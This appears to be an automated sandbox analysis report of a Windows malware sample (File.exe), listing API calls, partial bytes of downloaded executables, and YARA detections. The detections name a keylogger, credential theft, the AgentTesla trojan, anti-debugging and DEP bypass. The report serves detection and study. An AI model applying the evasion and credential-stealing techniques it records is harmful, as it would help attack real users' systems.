Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 2324	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000130 process_name: Host.exe process_identifier: 6452	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000130 process_name: cmd.exe process_identifier: 4996	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000130 process_name: conhost.exe process_identifier: 2068	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000130 process_name: pw.exe process_identifier: 2348	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000130 process_name: File.exe process_identifier: 1132	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: SHSPFVNKVD.exe process_identifier: 8548	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: cmd.exe process_identifier: 668	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 9168	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: pw.exe process_identifier: 8064	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 6116	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: 57w10427ebbdUHA4f4f4J20y9.exe process_identifier: 4376	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: cmd.exe process_identifier: 4560	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 6244	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: timeout.exe process_identifier: 2608	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 1276	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: svchost.exe process_identifier: 8680	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: cmd.exe process_identifier: 5564	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 3656	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: pw.exe process_identifier: 5092	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: AdvancedRun.exe process_identifier: 4920	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: powershell.exe process_identifier: 6548	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 3788	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: powershell.exe process_identifier: 4832	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: conhost.exe process_identifier: 3444	1	1
Process32NextW June 21, 2021, 12:58 p.m.	snapshot_handle: 0x00000108 process_name: powershell.exe process_identifier: 5856	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 3472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

Moves the original executable to a new location (3 events)

Time & API	Arguments	Status	Return
MoveFileWithProgressW June 21, 2021, 12:56 p.m.	newfilepath_r: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\user.config flags: 1 oldfilepath_r: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\t34hxy2d.newcfg newfilepath: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\user.config oldfilepath: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\t34hxy2d.newcfg	1	1
MoveFileWithProgressW June 21, 2021, 12:56 p.m.	newfilepath_r: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\user.config flags: 1 oldfilepath_r: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\qshsxbyz.newcfg newfilepath: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\user.config oldfilepath: C:\Users\test22\AppData\Local\埿埻堊埐埼埓堍\File.exe_Url_g4ubgpzegifk4comaq40inlb2tpubdt4\5.864.425.307\qshsxbyz.newcfg	1	1
MoveFileWithProgressW June 21, 2021, 12:57 p.m.	newfilepath_r: flags: 4 oldfilepath_r: C:\Users\test22\AppData\Local\Temp\File.exe newfilepath: oldfilepath: C:\Users\test22\AppData\Local\Temp\File.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses June 21, 2021, 12:56 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process file.exe (13 events)

Time & API	Arguments	Status	Return
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELP>võà"0h @ àNÔ`<O ¸r(À H.textg h `.rsrc¸ j@@.relocÀp@BpHÐdl""( rp}r p}( (>rpo3 "(4 Vs(5 t0~ ( t +þ(o o ((o o ((o o t o s o Þ , o Ü+*kv0% b% f%n% 4% 6%o% e% 2% s% f% 4%j% 2% c%/% 2% 3% n% request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ü=÷è¸\»¸\»¸\»±$ »±\»¸\»¡\» Â\|»»\» ÂE»¹\»µB»¹\» ÂG»¹\»Rich¸\»PEL!¦³Zà!z0 À@à!WÄ"d à°` 8 t.textÎ `.rdata` @@.dataPn0n@À.rsrcà @@.reloc`°@B request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: GetModuleHandleWGetTickCountJGetProcessHeap²SleepÀReadFileGetModuleFileNameWCreateFileW>lstrcatAEGetProcAddressRCloseHandleÖDeleteFileWµCreateThreadGlstrcpyAExpandEnvironmentStringsW¨CreateProcessWùWaitForSingleObjectêVirtualAllocExKERNEL32.dll3wsprintfWUSER32.dllÃSHGetFolderPathWSHELL32.dllMZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $0Øtf¶Ðtf¶Ðtf¶Ð·iéÐvf¶Ð·iëÐbf¶ÐEöÐf¶Ð®EªÐf¶Ðtf·Ð:g¶ÐE¯Ðwf¶ÐS ÄÐGf¶ÐS ÊÐuf¶ÐS ÎÐuf¶ÐRichtf¶ÐPELøÙWà46ú:P@°§ñð@üeTPd.text24 request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ü=÷è¸\»¸\»¸\»±$ »±\»¸\»¡\» Â\|»»\» ÂE»¹\»µB»¹\» ÂG»¹\»Rich¸\»PEL%¦³Zà! 0 P@à!W¼"d0à@` 8 t.textî `.rdataX @@.dataPþ0þ@À.rsrcà0@@.reloc`@@B request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: uleHandleWGetTickCountJGetProcessHeap²SleepÀReadFileGetModuleFileNameWCreateFileW>lstrcatAEGetProcAddressRCloseHandleÖDeleteFileWµCreateThreadGlstrcpyAExpandEnvironmentStringsW¨CreateProcessWùWaitForSingleObjectêVirtualAllocExKERNEL32.dll3wsprintfWUSER32.dllÃSHGetFolderPathWSHELL32.dllMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢ù¼æÒ]æÒ]æÒ]R#]ìÒ]R!]vÒ]R ]ÿÒ]x8]çÒ]ÁÑ\ôÒ]Á×\ûÒ]ÁÖ\÷Ò]ïàA]ïÒ]æÓ]Ò]ÁÛ\ãÒ]Á-]çÒ]æE]çÒ]ÁÐ\çÒ]RichæÒ]PEL]-nXà²bEÐ@P,Qd±@GTG@Ð request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ú'ô¾FX¾FX¾FX³{X¤FX³EX®FX³zXßFX·> X½FX¾FXõFXØ{X¸FXØFX¿FXØDX¿FXRich¾FXPEL?[à!¤Ê >À@@'W'(p$"@À0.textÔ¢¤ `.rdatanÀp¨@@.dataÌ90@À.reloc$p @B request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ü=÷è¸\»¸\»¸\»±$ »±\»¸\»¡\» Â\|»»\» ÂE»¹\»µB»¹\» ÂG»¹\»Rich¸\»PEL*¶Zà!¤0 ð@à¹W¼ºdÐàà` 8 t.textî `.rdataX @@.dataPÀ@À.rsrcàÐ²@@.reloc`à´@B request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: »¸»Æ»Ô»à»ì»ø»¼¼.¼6¼B¼X¼f¼r¼¼¼ ¼°¼¼¼Ø¼ê¼½8½ ½¶Zo8º8®¶Z¨º¨®%appdata%ntdll.dllRtlRandomEx%s\%s-f%s %s %sdata=1b3ae8d8-afde-4862-bd3a-69e3d5e4c41bMZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $*JWKrWKrWKrã×]Krã×ÊKrã×NKrÉëµVKr²qOKr²wJKr²vFKr8=ØRKr8=ìVKr^3á^KrWKsùKr¥{]Kr¥VKrWKåVKr¥pVKrRichWKrPEL´(nXàz:Ú@à\âd@ ØTXØ@x.text7yz `.rdata¢`b~@@.dataà8 à@À.rsrc@ ú request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $y´=ÕvÇ=ÕvÇ=ÕvÇ£u±Ç<ÕvÇ0Ç&ÕvÇ0©Ç,ÕvÇ0Ç_ÕvÇ4åÇ8ÕvÇ=ÕwÇvÕvÇKÇ9ÕvÇKªÇ<ÕvÇ0Ç<ÕvÇK¨Ç<ÕvÇRich=ÕvÇPEL)¦³Zà!~p0 @âWèâ<ðàXp8PÝ@4.text\|~ `.rdataYZ@@.dataþðàÜ@À.rsrcàð¼@@.relocX¾@B request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: ÿÿÿÿ D0þÿÿÿMZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $í ¾©hÐQ©hÐQ©hÐQÆ{Q¾hÐQÆNQ§hÐQÆzQðhÐQ©hÑQðhÐQ CQ¬hÐQÆ~Q«hÐQÆMQ¨hÐQRich©hÐQPEL_)QMà H( @ @ì½<¸Ø(º@ @.text* `.rdata4$ &@@.dataD,Ð¬@À.rsrc¸¼@@.relocÀ@B request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@Ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $ü?÷è¸^»¸^»¸^»±& »±^»¸^»¢^» À\|»»^» ÀE»¹^»µB»¹^» ÀG»¹^»Rich¸^»PEL¥¶Zà!00`@à'WÀ(d@àPl080x.text `.rdatavû 0ü @@.dataP0@À.rsrcà@@@.reloclP@B request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:57 p.m.	buffer: h0)À)Î)Ü)è)ô)*$6>J`nz¢°¾ÎÚö*++V+>+¥¶Zt8(8¥¶Z¬(¬%appdata%ntdll.dllRtlRandomEx%s\%s-f%s %s %sdata=d18ec754-a7f0-4dc3-8ad5-164da2ba1b9eMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $i7-VuÛ-VuÛ-VuÛÊÛ'VuÛÊÛ´VuÛÊÛ5VuÛ³ö²Û,VuÛ request_handle: 0x00cc000c	1	1
InternetReadFile June 21, 2021, 12:58 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELP>võà"0rÎ @ àÎt`xS ¸\|À H.textÔp r `.rsrc¸ t@@.relocÀz@B°HHq0"( rp}r p}( (>rpo3 "(4 Vs(5 t0~ ( t +þ(o o ((o o ((o o t o s o Þ , o Ü+*kv0% c% 8% b%n% 4% 0% b%o% 7% 9% f% s% 5% c% 2%j% 0% request_handle: 0x00cc000c	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (50 out of 62 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:56 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 21, 2021, 12:58 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 72 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: AdvancedRun.exe process_identifier: 3284		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0
Process32NextW June 21, 2021, 12:57 p.m.	snapshot_handle: 0x00000038 process_name: fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe process_identifier: 5808		0	0

Potentially malicious URLs were found in the process memory dump (5 events)

url	http://xenarmor.com/windows-product-key-finder-software/
url	http://www.SecurityXploded.com
url	http://securityxploded.com/windows-license-key-dump.php
url	http://securityxploded.com/instant-messengers-password-dump.php
url	http://securityxploded.com/ftp-password-dump.php

Yara rule detected in process memory (50 out of 144 events)

description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Run a KeyLogger	rule	KeyLogger
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	Run a KeyLogger	rule	KeyLogger
description	Steal credential	rule	local_credential_Steal
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Run a KeyLogger	rule	KeyLogger
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	email clients info stealer	rule	infoStealer_emailClients_Zero

Queries for potentially installed applications (12 events)

Time & API	Arguments	Status	Return
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000000b8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
